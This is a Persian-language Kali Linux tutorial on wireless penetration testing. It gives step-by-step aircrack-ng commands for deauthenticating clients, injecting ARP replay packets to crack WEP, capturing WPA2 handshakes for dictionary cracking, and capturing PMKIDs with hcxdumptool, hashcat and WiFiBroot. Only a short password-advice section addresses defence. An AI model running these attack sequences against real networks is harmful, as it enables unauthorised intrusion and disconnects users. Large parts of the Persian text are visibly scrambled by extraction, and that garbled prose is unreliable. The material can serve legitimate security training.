    ً یتقر ما را قادر رلسیکه کارت وا ،است airmon-ng میکنیاستفاده مایرلس هک و یکه برا یابزار نیاول باو شدهنییتع یهاتنها بسته رلسیوا یهاکند. معموالً کارت افتیو در ندیشبکه را بب کیتمام تراف سازدیم

    ما در نظر رلسیکارت وا یبرا کهشب کیتمام ترافمی توانیم airmon-ng. با کنندیم افتیموردنظرشان را در را داشته باشد. monitorاما برای اینکار آداپتور ما باید ویژگی .کنیمبگیریم و ترافیک محیط شبکه را شنود

    از دستور درادامه و مپیدا کنی airmon-ng را با دستور . میتوانیم آنستا wlan0 باالدر ما نام آداپتور وایرلس یم.استفاده کنبرای قرار دادن کارت در حالت مانیتور زیر

    airmon-ng airmon-ng start wlan0

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 23

    airodump-ngدستور -3

    یهاتا بسته سازدیاست که ما را قادر م airodump-ng م،یدار ازین aircrack-ngکه در مجموعه یابزار بعد است. دیمف بسیار کردن پسورد کرکخصوص در کار به نی. امی( کنcapture) افتیموردنظرمان را در

    را (wlan0mon) کارت وایرلسمان monitor و اینترفیس airodump-ng ها به ترتیب دستوربرای گرفتن بسته :کنیمتایپ می

    airodump-ng wlan0mon

    powerآدرس(، BSSID (MACموجود در محدوده را با یها APتمام airodump-ng د،ینیبیطور که مهمان

    MB)کانال(، channelداده(، یها)تعداد بسته data packets(، هامی)تعداد فر beacon frames)قدرت(، دیی)روش تأ authenticationشده(، )نوع رمز استفاده cipher(، ی)روش رمزنگار encryption)سرعت(،

    .دهدی( را نشان مAP)نام ESSID تی(، و درنهاتیهو

    .هستند CHو کانال BSSID لدهایف نیتر مهم ،یفا یهک کردن وا یبرا

    https://cybrit.ir/wifi-deauthentication-attack/https://cybrit.ir/wifi-deauthentication-attack/https://cybrit.ir/wifi-deauthentication-attack/

  • 21/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش aircrack-ng دستور -4

    aircrack-ng برنامه در مجموعه نیتر یاصلaircrack-ng یاست که برا crack نی. اشودیپسورد استفاده م را بعد WPA2و WPA یبرا dictionaryو کرک با WEPکرک یبرا یآمار یهاکیاستفاده از تکن ییابزار توانا

    handshake دارد.گرفتن

    aireplay-ng دستور -5

    Aireplay-ng قدرتمند در مجموعه یاز ابزارها گرید یکیaircrack-ng شیافزا ای دیتول یبرا تواندیاست و م را از یهرکس تواندیاست که م deauthمانند حمله یابزار در حمالت نیا ییاستفاده شود. توانا APدر کیتراف

    access point خارج کند، و در حمالتWEP وWPA2 در نیهمچن، وARP injection وreplay attacks دارد. مورد استفاده قرار

    Aireplay-ng دو منبع را به دست آورد: یهابسته تواندیم

    یهابسته live لیفا کی pcap شده ) گرفتهشیاز پpre-captured)

    حال است. اگر تابه winpcapو libpcapمانند packet capture یاز ابزارها یاستاندارد یخروج pcap لیفایک .دیکنیکار م pcap یهالیبا فا ادیز احتمالبه د،یااستفاده کرده Wiresharkاز

    aireplay-ng --help

    packet نت،یاکسس پو یBSSIDتوسط تواندیم aireplayکه مینیبیرا م aireplay-ng یباال راهنما ریدر تصوlength حمله یهانهیاز گز یبرخ میتوانیراهنما، م نییشود. در پا لتریف رهی)حداقل و حداکثر طول بسته(، و غ

    :مینیرا بب aireplay-ngبا استفاده از

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 24

    (، WEP عیکرک سر ی)الزم برا deauth ،fake deauth ،interactive ،arpreplay حمالت ابزار شامل نیا

    chopchop (بسته ییرمزگشا یبرا یروش آمار کیWEP ،)بدون کرک پسوردfragment ،caffe latte حمله( است. رهیکاربر( و غ ای clinet نتیبه سمت کال

    ً یتقر (aircrack-ng مجموعهمعرفی شده در باال )از چهار ابزار از اما .میکنیاستفاده م وایرلسیدر هر هک با-airbaseو airdecap-ng ،airtun-ng ،airolib-ngازجمله یگریخاص د یاز ابزارها یمجموعه شامل بعض نیا

    ng میداشته باش هانیاز ا کیکوتاه به هر ینگاه دییای. بباشدیم.

    6- airdecap-ng

    airdecap-ng دیکل نکهیبعدازا سازدیما را قادر م (key ) را رلسیوا کیتراف میرا کرک کرداکسس پوینت .میرا تماشا کن دهندیانجام مکارابران شبکه که ییو تمام کارها می( کنdecrypt) ییرمزگشا

    7- airtun-ng

    airtun-ng با میتوانی. ما مکندیم جادیا یتونل مجاز سینترفیا کیairtun-ng کی IDS رلسیوا کیتراف یبر رو . میکن ییرا شناسا رلسیوا APدر یگرید کیهر تراف ایمخرب کیتا تراف مینصب کن

    8- airolib-Ng

    airolib-ng است که یابزارESSID کندیسرعت کرک پسورد کمک مدر تسیپسورد ل باو کندیم رهیرا ذخ ها.

    9- airbase-ng

    airbase-ng را به مانرلسیکه کارت وا سازدیما را قادر مAP ابزار در انجام حمالت نی. امیکن لیتبدrogue AP ای evil twin است. اساساً دیمفairbase-ng یجاکه به دهدیبه ما اجازه م AP هانتیها به کال clinet

    ( ما متصل fake AP) یجعل APبه یواقع APاتصال به یجابه که میکن قیها را تشوو آن می)کاربر( حمله کن را با این ابزارها نشان خواهم داد. WPA2و WEPخب در ادامه نحوه کرک کردن پسوردهای شوند.

  • 21/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    Aircrack-ngبا استفاده از WEPکرک WEP (Wired Equivalent Privacy ضعیف ترین مکانیزم رمزگذاری منسوخ شده است که توسط روترها برای )

    بیتی 11از رمزگذاری این پروتکلنند، استفاده می شود. رمزگذاری بسته هایی که از طریق خود روتر عبور می کبیتی به عنوان یک استاندارد استفاده می کند، اما محققان امنیتی نقص های بسیاری در این مکانیزم 128و

    مانند تولید کلید استاتیک، روش دوباره کلید سازی سریع را کشف کردند. بسیاری از آسیب پذیری ها کشف :حمله هایی مانند ز حمالت بر این اساس طراحی شدند.شد و بسیاری ا

    حملهKorek’s Chop-Chop توسط ،Korek

    حملهCaffe Latte توسط ،Vivek Ramachandran

    حملهHirte توسعه حمله ،Caffe-Latte

    حملهFragmentation

    بررسی اجمالی

    WEP ای یتیب 128 ای یتیب 11قابل شکستن است. یمختلف یهابه روش ،یبدون در نظر گرفتن طول رمزگذار قرار نتیاکسس پو یرو WEP یشما، در هرصورت پسورد شما با رمزگذار دیو طول کل یدگیچیپ ای یتیب 142

    به عبارت ایها است (IV (Initialization Vectorsاست تعداد ازیکه مورد ن یزیاست شکسته شود. تنها چ دیکردن کل یابیکپچر شده و باز کیتراف ییرمزگشا ی( که براData Packetsداده ) یساده تر تعداد بسته ها

    که WPA2درحال حاضر منسوخ شده است، اما جایگزین بهتری برای آن داریم این پروتکل .شودیاستفاده م WPA2توان کلید در روترها نیز می WPSهست. اگرچه در صورت فعال بودن امن تر از نظر مکانیسم رمزگذاری

    با اینکه قدیمی است را باید مطالعه کنیم؟ WEPممکن است فکر کنید که چرا کرک . را بازیابی کرد

    ضروری است زیرا الزم است بدانید که از کجا آغاز شده است. WEPاین کار برای یادگیری و درک مکانیسم کرک کنند.فاده میاست WEPهای اطراف شما از رمزگذاری و شاید هنوز هم بسیاری از اکسس پوینت

    aircrack-ngاجرای -1

    بررسی کنید که اینترفیس و ،را وارد کنید airmon-ngکارت وایرلس خود را وصل کرده و در ترمینال کالی دستور است. wlan0در اینجا نام اینترفیس ما شناسایی شده است. airmon-ngوایرلس شما توسط ابزار

    ها برای جلوگیری از تداخلبستن پروسه -2

    اجرا کنید.مدیر شبکه کالی لینوکس تداخل دستور زیر را برای جلوگیری از

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 27 قرار دهید Monitor Modeکارت وایرلس را در حالت -3

    ( قرار گرفت، اکنون زمان اسکن محیط است. برای این کار، ما ازwlan0monکارت وایرلس در حالت مانیتور )

    استفاده خواهیم کرد. airodump-ngابزار

    گرفتن ترافیک محیط -4

    را شناسایی کنید. WEPرا اجرا کنید و یک اکسس پوینت [airodump-ng [monitor interfaceدستور

    هایی هستند آدرس هایی که در تصویر هایالیت شدند دستگاه MACاست، و wifiموردنظر ما ESSIDدر اینجا

    متصل هستند. B3:BE:BE:07:64:64که به روتر با مک آدرس

    موردنظر، APرا بزنید و باتوجه به ردیف CTRL+Cشناسایی کردید Encryption WEPبا APبعد از اینکه یک اطالعات را طبق زیر یادداشت کنید.

    BSSID (MAC AP): 64:64:B3:BE:BE:07

    ESSID (Name AP): wifi

    Channel (CH): 1

    Station (STA): AC:AC:EE:F4:F4:31

    این اطالعات استفاده خواهیم کرد.از برای کرکما در ادامه

  • 28/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش موردنظر APگرفتن ترافیک -5

    airodump-ngموردنظر و محل ذخیره فایل را در دستور AP، شماره کانال BSSIDباید WEPبرای کرک پسورد وارد کنید.

    airodump-ng --bssid [MAC AP] -c [CH num] -w [filename] wlan0mon airodump-ng --bssid 64:64:B3:BE:BE:07 -c 1 -w wifi wlan0mon

    در دستور باال پارامترهای

    --bssid مک آدرس اکسس پوینت -c شماره کانال -w نام فایل خروجی

    APاست. در مورد wifiهای گرفته شده از اکسس پوینت داده Dataدر خروجی توجه کنید. Data#به قسمت

    هایی است که برای رمزگشایی کلید استفاده خواهد شد. IVهمان Data#کنند استفاده می WEPهایی که از شود.می WEPهای بیشتر باعث کرک سریعتر Dataبه یاد داشته باشید که

    داشته باشید، با چنین IV 4888بسته گرفته شده. برای شروع کرک شما حداقل باید 1111ط در تصویر باال فق را کرک کرد. 12314، 11111رقمی مانند 4توان ساده ترین پسوردهای تعدادی فقط می

    تیم، سما به چندین هزار بسته نیاز داریم. اما از آنجایی که گرفتن بسته به زمان زیادی نیاز دارد و ما صبور نی ( کنیم.injectاینجکت ) APبرای سرعت کار ما باید بسته ها را به

    تعدادی دستگاه به روتر متصل هستند. اما اگر شما در stationهمانطور که در تصویر باال دیدید در قسمت وصل شود تا بتوانیم مک آدرس APآدرسی مشاهده نکردید، باید صبر کنید تا شخصی به MACاین قسمت

    آنها را جعل MACرا از کارت شبکه آنها دریافت کنیم. هنگامی که مک آدرس آنها را داریم، می توانیم او (spoof کنیم و بسته ها را در )AP تر کنیم!آنها تزریق کنیم. حاال می توانیم حمله مان را سریع

    ARPاینجکت ترافیک -6

    BSSIDاستفاده کنیم. ما به aireplay-ngبرای جعل مک آدرس آنها و اینجکت بسته ها، می توانیم از دستور را دریافت می کنیم ARPموردنظر متصل شده است نیاز داریم. ما یک بسته APو مک آدرس کالینتی که به

    نیاز داریم را تولید کنیم. به این WEPهایی را که برای کرک IVو سپس هزاران بار آن را منتشر می کنیم تا های جداگانه وارد کنید.شود. قبل از اینکار دستورات زیر را در ترمینالگفته می ARP Request Replayروش

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 21

    روی اکسس پوینت Packet Injectionتست

    است. بنابراین شما باید از نظر فیزیکی به اندازه کافی APقدرت کارت وایرلس به طور معمول کمتر از قدرت موردنظر، APارسال و دریافت کنید. برای اینکار روی APموردنظر نزدیک باشید تا بتوانید بسته ها را به APبه

    قرار APشویم که کارت وایرلس ما در فاصله نزدیک دهیم و مطمئن میانجام می Packet Injectionتست ی تواند بسته ها را به آن اینجکت کند.دارد و م

    aireplay-ng -9 -a 64:64:B3:BE:BE:07 wlan0mon

    در دستور باال پارامترهای

    -9 یعنی تستinjection -a مک آدرس اکسس پوینت

    ( با اکسس پوینتfake authenticationتأیید هویت جعلی )

    یک بسته را بپذیرد باید با مک آدرس آن از قبل ارتباط داشته باشد. بنابراین مک آدرسی که برای APبرای اینکه ( باشد یا مک آدرس fake authenticationاینجکت استفاده می کنید، باید یا از طریق تایید هویت جعلی )

    در ارتباط بوده است. APکالینتی باشد که قبالً با

    ت، از تأیید هویت جعلی استفاده کنید:برای ارتباط با اکسس پوین

    aireplay-ng -1 0 -a 64:64:B3:BE:BE:07 -h c4:c4:84:7b:7b:82 wlan0mon

    در دستور باال پارامترهای

    -1 یعنیfake authentication -a مک آدرس اکسس پوینت -h مک آدرس کارت وایرلس شما

    را وارد کنید. زیر تان دستوربرای مشاهده مک آدرس کارت وایرلس

    macchanger -s wlan0mon

  • 38/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    به سرعت در حال افزایش شود. Dataرا انجام دهید، و صبر کنید تا ARP Request Replayدر آخر حمله

    aireplay-ng -3 -b 64:64:B3:BE:BE:07 -h c4:c4:84:7b:7b:82 wlan0mon

    شوند. گرفته می wifiهای تولید شده در فایل IVرا به اکسس پوینت اینجکت می کنیم، ARPهای زمانیکه بسته

    اکنون زمان آن رسیده که کلید را از فایل کپچر شده بدست بیاوریم.

    کرک پسورد -7

    را اجرا کنید. سپس صبر کنید تا کلید را پیدا کند. aircrack-ng [output filename].capدستور

    ls aircrack-ng wifi-01.cap

    موفق نشدیم پسورد را کرک کنیم. پس باید با IV 5788باال مشاهده می کنید، با همانطور که در تصویر

    aireplay-ng 23000های بیشتری تولید کنیم. این بار ما روی بسته IV کنیم. بعد از گرفتن تعداد امتحان می می دهد.پسورد را در خروجی نمایش aircrack-ngمجدد دستور باال را وارد کنید تا Data#زیادی

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 31

    ها Dataعوامل مؤثر در دریافت

    . کاربر در حال اتصال یا قطع اتصال )آهسته ترین حالت(1

    کند(هزار بسته دریافت می 28. کاربر در حال مرور یا دانلود )سریعترین حالت، در چند ثانیه تا 2

    د.حال دانلود/اتصال به شبکه باش این موارد ایده آل هست زیرا تقریباً در هر زمانی مطمئن نیستید که کاربر در

    در کالی لینوکس” Monitor mode“روش دیگر برای رفع خطای

    استفاده می کنیم، ولی می توانیم از airmon-ng check killهای درحال اجرا از کردن تمام پروسه killما برای ه اتصال به شبک ینفوذ و برا تست انیاما بعد از پااستفاده کنیم. service network-manager stopدستور

    .دیرا اجرا کن service network-manager startدستور دیبا

    service network-manager stop service network-manager start

    .را به شما نشان دهم WPA2، در ادامه می خواهم نحوه کرک WEPاین از کرک

    Aircrack-ngبا استفاده از WPA2-PSKکرک یفا یاز هک وا یریجلوگ یآسان است و برا اریبس WEP، کرک WEPدر پروتکل یتیامن دینقض شد لیدلبه

    .میکنیاستفاده م WPA2-PSKاز شتریب تیو امن

    WPA2-PSK چیست؟

    WPA2-PSK مخففWi-Fi Protected Access – Pre-Shared Key یکی از الگوریتم های رمزگذاری وایرلس AESنقص نیست. این رمزگذاری با الگوریتم دیگر آنقدرها هم بی KRACKیری پذهست که با انتشار آسیب

    هنوز در برابر هکرها بسیار آسیب پذیر است. WPA2شکستن باشد، اما سیستم ممکن است امن و غیرقابل ند.کیفرآیند تأیید اعتبار استفاده م برایطرفه handshake) 1)از یک هندشیک WPA2، پروتکل WEPبرخالف

    طرفه چیست؟ 4هندشیک

    دیلکه ک نیبدون ا نتیو کال نتیشده است که اکسس پو یطراح یطرفه به گونه ا handshake) 1)کیهندشرا (PSK/PMK (Pairwise Master Key دیکلو ثابت کنند گریکدیتوانند به طور مستقل به یرا آشکار کنند م

    تفاده کنند که فقط با اس یارسال م گریکدیشده به یررمزگذا یهاامیپ نت،یو کال نتیشناسند. اکسس پو یمانجام شد، تیها با موفق امیپ ییاست و اگر رمزگشا ییکه قبالً آنها به اشتراک گذاشتند قابل رمزگشا PMKاز

    کند. یرا ثابت م PMKامر شناختن نیا

    هندشیک چهار طرفه به یک هکر اجازه می دهد اطالعات متنی زیر را بگیرد.

    آدرس اکسس پوینتمک مک آدرس کالینت ESSID اکسس پوینت

  • 32/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    ( pcapاطالعات باال توسط هکر برای انجام حمله دیکشنری بر روی هندشیک چهار طرفه گرفته شده )فایل .میاستفاده می شود. بیایید ببین

    ( چیست؟dictionaryحمله دیکشنری )

    ه امنیتی توسط متخصصان برای محافظت از )درهم سازی( یکی از کلیدهایی است که در زمین Hashingهش کاربران در برابر هکرهای مخرب استفاده شده است.

    است که داده یا فایل هایی با طول دلخواه را به طول ثابت تبدیل می کند cryptographicهش فقط یک تابع فرآیند وجود ندارد. ، معکوس کردن آن عمالً غیرممکن است. زیرا هیچ کلیدی در اینencryptionکه برخالف

    شوند، اما چیزی به عنوان decodeو decryptشده به ترتیب می توانند encodeشده و Encryptداده های de-hashing .وجود ندارد و یک هش همیشه بی نظیر است

    در یک حمله دیکشنری

    های ممکن(( استفاده یا ایجاد می کنیم )فایل متنی پسوردwordlistما از یک لیست کلمات ) .1 بطور لحظه ای کلمات را آزمایش کنید .2 WPA2برای PBKDF2، هش خود را ایجاد کنید Hashبا استفاده از تابع .3 خروجی را با هش موجود مقایسه کنید. .1 اگر خروجی مطابقت داشت، پسوردی که از لیست کلمات گرفته شده است، رمز عبور صحیح است .4

    بیاید شروع کنیم،

    در حالت مانیتور قرار بدید کارت وایرلس را -1

    ifconfig wlan0 airmon-ng check kill airmon-ng start wlan0

    تغییر داده است. wlan0monشما را به wlan0اینترفیس airmon-ngتوجه داشته باشید که

    airodump-ngکپچر ترافیک محیط با -2

    را طیحم رلسیوا کیکه تمام تراف میرا دار ییتوانا نیاست، ما ا توریما در حالت مان رلسیاکنون که آداپتور وا وند.داده ش شیکه به آن متصل هست نما ینتیهدف ما و کال نتیتا اکسس پو میمانی. منتظر ممینیبب

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 33

    است. توجه داشته باشید که ” wifi“همانطور که در تصویر باال مشاهده می کنید، اکسس پوینت موردنظر ما

    ها در قسمت باالیی صفحه و کالینت ها در قسمت پایین صفحه نمایش داده می شوند. APتمام

    اکنون اطالعات هایالیت شده را بررسی خواهیم کرد.

    ESSID AP: wifi MAC AP (BSSID): 64:64:B3:BE:BE:07 Client MAC: E0:E0:A5:F2:F2:49 Channel: 11

    متوقف کنید. را فشار دهید تا فرایند کپچر را CTRL+C کلید

    کپچر ترافیک اکسس پوینت موردنظر -3

    ، مجدداً PCAPو ذخیره هندشیک چهار طرفه در یک فایل ” wifi“برای گرفتن بسته های مرتبط با اکسس پوینت airodump-ng کنید. را با توجه به اطالعات بدست آمده در باال اجرا

    airodump-ng --bssid 64:64:B3:BE:BE:07 -c 11 -w wifi wlan0mon

    نام فایلی است که خروجی دستور در آن ذخیره می شود.” wifi“در دستور باال

    قطع کنید aireplay-ngاتصال کالینت را با -4

    روش امکان پذیر است، 2گرفتن هندشیک از

    منتظر بمانید تا کالینت به اکسس پوینت متصل شود. .1 خودکار کالینت به اکسس پوینت متصل شود.اتصال کالینت را قطع کنید تا مجددا بصورت .2

  • 31/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    دقیقاً مناسب است زیرا هم 2منتظر بودن برای اتصال کالینت می تواند بسیار وقت گیر باشد. بنابراین گزینه متصل هست.” wifi“اکنون یک کالینت به اکسس پوینت

    مورد نظر APخواست تأیید اعتبار به با توجه به اطالعاتی که قبالً بدست آوردیم، یک در aireplay-ngما از ابزار ها یک سوء استفاده انجام می دهیم که کارت وایرلس را ارسال کنیم. ما در واقع از ویژگی اتصال دیوایس

    وصل شود. در گزینه دوم در واقع نتیجه اتفاقی که می افتد همان APمجبور می کند در صورت امکان دوباره به است، بنابراین می توانیم هندشیک را بگیریم. 1گزینه

    جدا می شود APاز Deauthکالینت هنگام دریافت بسته .1 APاتصال مجدد به .2 و کالینت اتفاق می افتد APطرفه بین 1هندشیک .3 فه را دریافت می کند.طر 1هندشیک airodump-ngهکر با ابزار .1

    جدا کنیم، یک ترمینال جدید باز کنید و دستور زیر را اجرا کنید APبیایید کالینت را از

    aireplay-ng -0 5 -a 64:64:B3:BE:BE:07 -c E0:E0:A5:F2:F2:49 wlan0mon

    -0 5 درخواست بسته 4به معنیDeauth بهBSSID اکسس پوینتwifi 0-است. درواقع سوئیچ

    استفاده کنید. 8از 4های بی پایان به جای است. برای ارسال بسته deauth--همان پارامتر -a این سوئیچ برای معرفیBSSID .اکسس پوینت موردنظر است wlan0mon .اینترفیس کارت ویرلس شما در حالت مانیتور هست

    هندشیک را بگیرید -5

    شما چنین چیزی را مشاهده خواهید کرد: airodump-ngبعد از اتصال مجدد کالینت، در باالی خروجی

    WPA Handshake: 64:64:B3:BE:BE:07

    موردنظر شما گرفته شده است. BSSIDبرای WPAاین بدان معنی است که هندشیک

    را با استفاده از هندشیک گرفته شده کرک خواهیم کرد. APرا فشار دهید، اکنون پسورد CTRL+Cکلید

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 34 هندشیکبررسی -6

    ( را در wifi-01.capذخیره شده ) PCAPتوانید برای بررسی هندشیک، فایل این مرحله اختیاری است. شما می وایرشارک باز کنید و ببینید هندشیک چگونه به نظر می رسد.

    کنید و تایپ display filterرا در قسمت eapolفیلتر . وایرشارک دستور زیر را اجرا کنیدبرای باز کردن فایل در [ENTER.را بزنید ]

    طرفه است که در هنگام 1کنید. این همان هندشیک مشاهده می 1تا 1هایی از شماره پیام” info“در ستون

    ها را ببنید.توانید آنمی Destinationو Sourceو کالینت اتفاق افتاده است. در ستون APاتصال

    WPA2یک حقیقت تلخ در مورد کرک -7

    هندشیک را گرفتید، شانس شما برای کرک کلید به همان اندازه پسورد لیست شماست. هنگامی که

    قطعی نیست، زیرا موفقیت کرک به لیست کلمات دیکشنری بستگی دارد و ما WEPمانند WPA2کرک پسورد در لیست کلمات است. بنابراین، شما هیچ وقت مطمئن نیستید که یک دیکشنری کار APنمی دانیم که کلید

    دهد کرد یا نه.جواب می

    شود، یک دیکشنری که فقط شامل در این آموزش برای اینکه نشان دهیم چگونه خروجی کرک پسورد ظاهر می هست. wifi123456″”کنم. در اینجا کلید اکسس پوینت موردنظر ما هست ایجاد می APکلید

    echo "wifi123456" > wlist cat wlist

    در اینجا به طور مستقیم پسورد اکسس پوینت را در لیست کلمات ذخیره کردیم تا نحوه کرک را نشان دهیم.

    را اجرا کنید aircrack-ngابزار WPA2برای کرک

    aircrack-ng [.cap file] -w [path/to/wordlist] aircrack-ng wifi-01.cap -w ./wlist

    حیهست. و توض یرکتوریداخل دا یبه معن“/” است، و فوروارد اسلش یفعل یرکتوریمخفف دا“.” نقطه ).( است. یفعل یرکتوریدر داخل )/( دا wlistبه نام یلیفا یبه معن” wlist/.“که دهدیم

  • 31/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    پسورد را به سرعت کرک کرده است. aircrack-ngبینید ابزار همانطور که می

    اقدامات متقابل برای جلوگیری از کرک پسورد

    یک رمز عبور قوی است. !Wifi@#123456از یک پسورد قوی استفاده کنید. برای مثال:

    یک پسورد قوی باید

    ها و شخص نباشدشامل کلمات قابل حدس و مکان کاراکتر 13شامل شامل کاراکترهایspecial )!&%$#@( مانند شامل حروف بزرگ و کوچک شماره تلفن همراه و اطالعات شخصی نباشد

    .به شما نشان دهم PMKIDرا با حمله WPA2در ادامه می خواهم نحوه کرک

    PMKIDوایرلس با حمله WPA2-PSKکرک و نتیکال نیطرفه ب 1 کیهندش میدار ازین PSK دیکل افتیدر یکه برا مداد حیتوض WPA2-PSKکرک یبرا

    AP به نتیتا کال میکه مستلزم آن بود که منتظر بمان میکن افتیرا درAP قبالً متصل نتیاگر کال ایمتصل شودکار در نیتا دوباره وصل شود. ا میبمانو منتظر میجدا کن Deauthenticationبا حمله APشده بود، او را از

    ییو قابل شناسا یحمله تهاجم کی APاز نتیجدا کردن کال رایز شود،یمحسوب م یبزرگ سکیر کیفارنز هش شده را دیتا کل میعبور کن کیاز مرحله گرفتن هندش میشد اگر بتوان یاست. چه م IDS یهاستمیس

    ً یمستق ً یدق نی. امیکن افتیدر APاز ما است! PMKIDحمله همان قا

    ساخته شده است. آنها در حال انجام hashcatدر یتیتوسط محققان امن 2818در آگوست دیروش جد نیاکردند. آنها دایپ یجالب زیبودند که چ hcxtoolsموجود در مخزن یبا ابزارها یفا یدر مورد هک وا قیتحق

    ً ی، مستقAPبه نتیتوانند بدون اتصال کال یکه م افتندیدر است. PSKکه شامل رندیبگ APرا از یاطالعات ما

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 37

    به طور تصادفی کشف WPA3این حمله هنگام جستجوی راه های جدید برای حمله به استاندارد جدید امنیتی انجام می شود. EAPOLشد و تنها با یک فریم

    .میاستفاده کن رلسیکند و از آن در تست نفوذ وا یابزار چگونه کار م نیکه ا مینیبب دییایب

    نصب ابزارهای موردنیاز -1

    تا این لحظه در مخازن کالی تعبیه نشده است. اما می توانیم آنها را PMKIDابزارهای مورد نیاز ما برای حمله را دانلود و نصب کنید: hcxtoolsدانلود کنیم. ابزار githubاز

    git clone https://github.com/ZerBea/hcxtools.git apt install libpcap-dev libcurl4-openssl-dev libssl-dev cd hcxtools make make install

    را نصب کنید: hcxdumptoolدر یک ترمینال جدید ابزار

    git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make make install

    شنود ترافیک محیط -2

    قرار توریخود را درحالت مان رلسیکارت وا airmon-ngبا ابزار دیهدف ابتدا با نتیکردن اکسس پو دایپ یبرا است. wifiهدف ما نتی. اکسس پومیکنیکپچر م airodump-ngرا با طیمح کی. در ادامه ترافمیده

  • 38/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    PMKIDبرای گرفتن hcxdumptoolاستفاده از ابزار -3

    )رمز عبور( PSKی حاو PMKIDهدف و گرفتن APبرای ارتباط مستقیم با hcxdumptoolگام بعدی استفاده از است.

    hcxdumptool -i wlan0mon -o AP-PMKID --enable_status=1

    در دستور باال

    -i اینترفیس کارت وایرلس درحالت مانیتور -o نام فایل خروجی برای ذخیرهPMKID

    های محیط دریافت شوند.اکسس پوینت PMKIDبعد از اجرای دستور صبور باشید تا تمام

    هدف PMKIDخواهید های موجود در محیط را بدست آورید، بلکه می PMKIDشما احتماالً نمی خواهید تمام کنیم. برای انجام این کار، هدف را به دستور اضافه می BSSIDموردنظر را دریافت کنید. برای این کار فیلتر

    توجه کنید که نباید شامل دو نقطه یا )مک آدرس( هدف ایجاد کنید. BSSIDشما باید یک فایل متنی با مقدار ویرگول باشد:

    echo 6464B3BEBE07 > targetBSSID

    بخصوص را به دستور اضافه کنیم: APدر ادامه باید فیلتر های موردنیاز برای یک

    hcxdumptool -i wlan0mon -o wifi-PMKID --enable_status=1 --filterlist_ap=targetBSSID --filtermode=2

    هدف را دریافت PMKIDدر خروجی ترمینال hcxdumptoolکنید که این دستور بعد از مدتی مشاهده میبا کند!ذخیره می” wifi-PMKID“کند و در فایل می

    را حذف کنید PMKIDتمام داده های اضافی موجود در -4

    PMKID حاوی هشPSK است، اما همچنین بسیاری از اطالعات دیگر را که ما به آنها نیاز نداریم شاملرا باقی گذاریم. برای PSKشود. قبل از شروع به کرک هش، باید این داده ها را حذف کنیم و فقط هش می

    کنیم.استفاده می hcxpcapngtoolانجام این کار، ما از ابزار

    cd hcxtools hcxpcapngtool wifi-PMKID -o output.txt

    قرار می دهیم. output.txtرا در فایل PSKبا دستور باال هش

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 31 کرک هش -5

    ، johnمرحله آخر کرک هش است. ما می توانیم این کار را با هر یک از ابزارهای کرک رمز عبور از جمله hashcat و بسیاری دیگر انجام دهیم. در اینجا من از ابزارhashcat برای کرک کردن آن به همراه دیکشنری

    خودم استفاده می کنم.

    hashcat -m 22000 output.txt dict.txt

    در دستور باال

    -m 22000 مشخص کردن نوع هش WPA-PBKDF2-PMKID+EAPOL output.txt فایل حاوی هشPSK dict.txt فایل دیکشنری پسورد لیست

    WiFiBrootبا ابزار PMKIDاجرای حمله

    WiFiBroot یهک شبکه ها ییاست که توانا یفا یابزار متن باز کرک وا کی Wi-Fi بر یمبتنWPA/WPA2 رامورد رلسیشبکه وا کیاز حمالت به یانجام تعداد یتواند برا یابزار چند منظوره است و م کی نیدارد. ا

    .دیدانلود کن githubاز دیتوانیابزار را م نی. اردیاستفاده قرار گ

    و کرک را PMKID، گرفتن هندشیک، حمله Deauthenticationابزار توانایی شنود ترافیک محیط، حمله این دارا است، بنابراین تمام حمالت در مدت زمان بسیار کوتاهی انجام می شوند.

    دستورات زیر را اجرا کنید: WiFiBrootبرای نصب ابزار

    pip3 install scapy==2.4.0 git clone https://github.com/hash3liZer/WiFiBroot.git

    های ابزار دستور زیر را اجرا کنید:برای مشاهده گزینه

    cd WiFiBroot python2.7 wifibroot.py -h

    Syntax: $ python wifibroot.py [--mode [modes]] [--options] $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt Modes: #Description Value 01 Capture 4-way handshake and crack MIC code 1 02 Captures and Crack PMKID (PMKID Attack) 2 03 Perform Manual cracking on available

    capture types. See --list-types 3 04 Deauthentication. Disconnect two stations

    and jam the traffic. 4 Use -h, --help after -m, --mode to get help on modes.

    و گزینه، فیلترهای خاص خود را دارد. به مثال زیر مراجعه کنید: Modeهر

  • 18/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    :handshake، حالت 1مد

    python2.7 wifibroot.py --mode 1 -h

    Mode: 01 Capture 4-way handshake and crack MIC code 1

    Options: Args Description Required -h, --help Show this help manual NO -i, --interface Monitor Interface to use YES -v, --verbose Turn off Verbose mode. NO -t, --timeout Time Delay between two deauth requests. NO -d, --dictionary Dictionary for Cracking YES -w, --write Write Captured handshake to a seperate file NO --deauth Number of Deauthentication frames to send NO Filters: -e, --essid ESSID of listening network -b, --bssid BSSID of target network. -c, --channel Channel interface should be listening on. Default: ALL

    :PMKID، حمله 2مد

    python2.7 wifibroot.py --mode 2 -h

    Mode: 02 Captures and Crack PMKID (PMKID Attack) 1

